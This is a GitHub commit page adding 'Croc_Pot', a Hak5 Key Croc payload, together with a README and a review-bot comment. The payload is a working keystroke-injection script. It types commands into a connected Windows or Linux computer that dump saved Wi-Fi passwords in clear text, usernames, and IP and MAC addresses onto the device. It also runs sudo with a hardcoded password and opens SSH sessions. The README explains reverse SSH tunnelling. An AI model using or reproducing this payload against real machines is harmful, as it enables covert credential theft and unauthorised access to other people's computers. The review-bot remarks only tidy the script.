Merge pull request #23 from spywill/master

Croc_Pot
pull/25/head
Darren Kitchen 2021-10-02 14:59:55 -05:00 committed by GitHub
commit feb6ec1e01
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 6127 additions and 0 deletions

5682
library/Croc_Pot/Croc_Pot.sh Normal file

File diff suppressed because it is too large Load Diff


@ -0,0 +1,377 @@
# Title: Croc_Pot Payload
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
# This will collect some data off target PC
# (ip address, current user name, pc host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder
# Author: Spywill
# Version: 1.3.1
# Category: Key Croc
MATCH crocpot
#---> Edit KEYCROC_PASSWD_HERE
CROC_PW=hak5croc
#---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX
#---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC
echo "${CROC_PW}" >> /tmp/CPW.txt
#----Create Croc_Pot folders
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
LED B
else
mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
fi
#---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
cat > ${CROC_OS}
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
#---> Enter ethernet mode for OS detection
ATTACKMODE AUTO_ETHERNET
LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot
GET TARGET_OS
GET TARGET_IP
GET HOST_IP
GET TARGET_HOSTNAME
#---> After OS detection case TARGET_OS value
case $TARGET_OS in
WINDOWS)
LED R
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
sleep 1
#---> Start windows powershell
Q GUI r
sleep 1
Q STRING "powershell"
Q ENTER
sleep 5
#---> Place keycroc usb drive into variable
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
Q ENTER
sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER
sleep 2
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER
sleep 3
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER
sleep 3
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
Q ENTER
sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp -a 172.16.84.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
Q ENTER
sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
Q ENTER
sleep 2
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 2
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
sleep 2
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" >> ${CROC_OS}
echo "$TARGET_IP" >> ${CROC_OS}
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
echo "$HOST_IP" >> ${CROC_OS}
#---> Edit with sed to remove powershell output "r" endlines & remove first character
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
MACOS)
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
LED G
sleep 1
#---> Start mac os terminal
Q GUI-SPACE
sleep 1
Q STRING "terminal"
Q ENTER
sleep 2
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 2
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
sleep 1
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" >> ${CROC_OS}
echo "$TARGET_IP" >> ${CROC_OS}
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
echo "$HOST_IP" >> ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
LINUX)
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
LED B
sleep 3
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
case $TARGET_HOSTNAME in
raspberrypi)
#---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
Q GUI d
sleep 1
Q STRING "terminal"
Q ENTER
Q ENTER
sleep 2
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER
sleep 2
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER
sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER
sleep 2
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 2
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
parrot)
#---> Start mate-terminal -->Parrot OS<--
Q ALT F2
sleep 1
Q STRING "mate-terminal"
Q ENTER
sleep 1
#---> Create keycroc directory
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
Q ENTER
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER
sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER
sleep 5
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER
sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 2
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 1
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
*)
#---> Start linux distributions terminal xterm
#---> Unsure of which linux distribution this will work on
Q ALT F2
sleep 1
Q STRING "xterm"
Q ENTER
sleep 1
#---> Create keycroc directory
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
Q ENTER
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER
sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER
sleep 5
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER
sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER
sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 2
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 1
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
esac
;;
esac
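Review bot: The setup lines at the top of the payload append the Key Croc root password in clear text to a fixed path with `echo "${CROC_PW}" >> /tmp/CPW.txt`, so the secret gains one line per run and stays on the device; nothing in this file removes it or restricts its mode, and whether the suppressed Croc_Pot.sh cleans it up is not visible here. If the file is really needed, write it once under a restrictive mask, `( umask 077; printf '%s\n' "${CROC_PW}" > /tmp/CPW.txt )`, and delete it after use; the shipped default `CROC_PW=hak5croc` also deserves a comment telling the user to change the device password itself rather than only edit this variable. Separately, the folder check `[[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]` tests its second operand as a non-empty string, which is always true; it should read `&& -d "/root/udisk/tools/Croc_Pot"`, or the test can be dropped because `mkdir -p` is already idempotent. The truncation `cat > ${CROC_OS}` reads from stdin and may block if stdin is left open, so `: > "${CROC_OS}"` is the safer form.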


@ -0,0 +1,68 @@
# Croc_Pot
## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc (Croc_Pot in development and testing)
* **Croc_Pot_Payload.txt**
- Will start OS detection scan to see what OS the keycroc is pluged into (usb), collect some data off the target pc, automatically start an SSH session with connected target pc (wifi) and start Croc_Pot script
- Ensure your keycroc is connected to the target pc wifi first before running **crocpot** If you do not have the target pc wifi credentials Croc_Pot has a payload to get you online (payload called getonline working on windows and Raspberry pi in development for linux version)
* **Croc_Pot.sh**
- This project is to automate some commands for the keycroc for quicker setup, install payloads, remotely connect to keycroc, nmap tcpdump target pc scan, edited files on your keycroc, send e-mail from your keycroc, SSH to hak5 gear, run hak5 cloud C2 on keycroc, status of your keycroc, and more
* **TESTED ON**
- Windows 10
- Raspberry pi 4 with gnome-terminal installed
- linux parrot os
- Sorry no support for MAC OS
## INSTALLATION :
* Two file to this script
- Will need to enter arming mode on your keycroc to install files.
- First file is called **Croc_Pot.sh** Place this in the KeyCroc **tools folder**.
- Second file is called **Croc_Pot_Payload.txt** Place this in the KeyCroc **payload folder**.
- Edited the Croc_Pot_Payload.txt file for your keycroc passwd. default is (hak5croc)
- Ensure your KeyCroc is connected (wifi) to the same local network as the target pc
## STARTING CROC_POT :
- First way to start Croc_Pot.sh is ssh into your keycroc and type **/root/udisk/tools/Croc_Pot.sh**.
- Second way to start Croc_Pot.sh is type in anywhere **crocpot** this will start Croc_Pot.sh script automatically.
- It is recommended to start Croc_Pot.sh script with typing in **crocpot** as this payload will collect some data off the target pc. Some of the info that it will collect will be Target pc (ip address, current user name, pc host name, ssid and passwd, mac address), This info will be used in the Croc_Pot.sh script.
- **NOTE:** When running **crocpot** scan takes about 30-40 sec to start because of OS detection then Croc_Pot will start.
## SSH MENU :
### SSH TO HAK5 GEAR
* Ensure all hak5 gear is connected to the same local network as your keycroc
- Recommended to setup ssh PUBLIC AND PRIVATE KEY to each of your hak5 gear, SSH to your gear Without Password
- SSH keycroc to Bash Bunny setup, first ensure your bash bunny has internet connection and connected to the same pc as your Keycroc, (bash bunny internet setup can be found at docs.hak5.org), Croc_Pot.sh will create a payload for your bash bunny, this file will be saved on your keycroc at tools/Croc_Pot/Bunny_Payload_Shell then copy this file to one of the payload switches on your bash bunny this is to start Reverse SSH Tunnel to keycroc.
### CREATE PUBLIC AND PRIVATE KEY
* Perform SSH Login Without Password Using ssh-keygen & ssh-copy-id
* Step 1: Create public and private keys using ssh-key-gen on local-host
- jsmith@local-host$ **Note: You are on local-host here**
- jsmith@local-host$ **ssh-keygen**
- [Press enter key]
* Step 2: Copy the public key to remote-host using ssh-copy-id
- jsmith@local-host$ **ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote-host-ip**
- jsmith@remote-host's password:
* Step 3: Login to remote-host without entering the password
-jsmith@local-host$ **ssh username@remote-host-ip**
* The above 3 simple steps should get the job done in most cases.
### Setup Reverse SSH Tunnel
- Reverse SSH is a technique that can be used to access systems (that are behind a firewall) from the outside world.
- Here is the command for remote server side
- **ssh -fN -R 7000:localhost:22 username@your-Machine-ipaddress**
- Now do an ssh connection request from your machine to your own machine at port 7000:
- **ssh username@localhost -p 7000**
- Here, though it may seem like you are doing ssh on localhost but your request would be forwarded to remote host. So, you should use your account ? username ? on remote server and when prompted for password, enter the corresponding password.
### Screenshot
![Screenshot from 2021-08-12 07-54-07](https://user-images.githubusercontent.com/71735542/129192585-d0933663-748a-4000-9102-6e1ceb4a851c.png)
![Screenshot from 2021-08-12 07-57-38](https://user-images.githubusercontent.com/71735542/129192913-8b880ee7-31f3-41ba-ac6b-59188e594460.png)
![Screenshot from 2021-08-12 08-00-12](https://user-images.githubusercontent.com/71735542/129193161-60bea2b4-99f5-4781-8a8c-dbd7d4b3d27f.png)
![Screenshot from 2021-08-12 08-03-59](https://user-images.githubusercontent.com/71735542/129193656-fbfcbc3c-207b-4555-be22-32a66cbe9aea.png)